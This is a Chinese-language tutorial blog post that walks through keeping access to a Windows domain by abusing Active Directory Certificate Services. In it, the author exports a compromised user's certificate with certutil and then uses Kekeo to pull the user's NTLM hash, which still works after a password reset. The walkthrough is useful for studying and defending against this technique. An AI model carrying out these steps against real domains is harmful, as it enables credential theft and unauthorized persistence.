内网渗透之ADCS权限维持

内网渗透之ADCS权限维持

文章前言

本篇文章主要介绍如何通过证书服务来实现权限维持的目的

基本原理

在微软的文档里有一段话"当使用PKCA时，KDC在权限属性证书(PAC)中会返回用户的TLM"，也就是说当使用证书进行Kerberos认证的时候，返回票据的PAC包里面还有TLM票据，故可以用于获取用户TLM Hash

如果我们控制的目标主机中存在企业CA，则用户(或计算机)可以请求注册任何可用模板的证书，在用户凭证被盗时，我们可以请求一个模板证书，该模板允许我们作为该用户(或机器)向Active Directory进行身份验证，由于证书是独立的身份验证材料，即使用户(或计算机)重置了密码，这些证书仍然可用~

漏洞利用

下面我们用一个案例来说明：

Step 1：控制域内一台主机，发现里面有个用户的证书

Step 2：查看可用证书

代码语言：javascript代码运行次数：0运行复制

certutil -user -store My

Step ：使用certutil导出证书(如果导出不了的话，就用mimikatz来导出证书)

代码语言：javascript代码运行次数：0运行复制

certutil -user -exportPFX f418dede29047696deeb6f5f099f1b58c918fb c:\Users\Al1ex.HACKE\Desktop\Al1ex.pfx

Step 4：然后把pfx文件拷贝到我们自己的计算机，双击导入，输入刚刚我们输的密码

Step 5：然后在我们本地的计算机做个代理进内网，并且把DS也代理进去(dns设置为内网的域控)

Step 6：使用Kekeo获取用户的TLM

代码语言：javascript代码运行次数：0运行复制

tgt::pac /subject:Al1ex /castore:current_user /domain:

Step 7：修改用户密码——Kksvqm@12

Step 8：使用之前的证书依旧可以窃取的用户的TLM Hash

代码语言：javascript代码运行次数：0运行复制

tgt::pac /subject:Al1ex /castore:current_user /domain:

文末小结

本篇文章主要介绍了ADCS在权限维持方面的应用，其实ADCS还可以用于权限提升、中级攻击等多维度，后续有机会在进行逐一分享

本文参与 腾讯云自媒体同步曝光计划，分享自。原始发表：2025-01-06，如有侵权请联系 cloudcommunity@tencent 删除主机代理服务计算机权限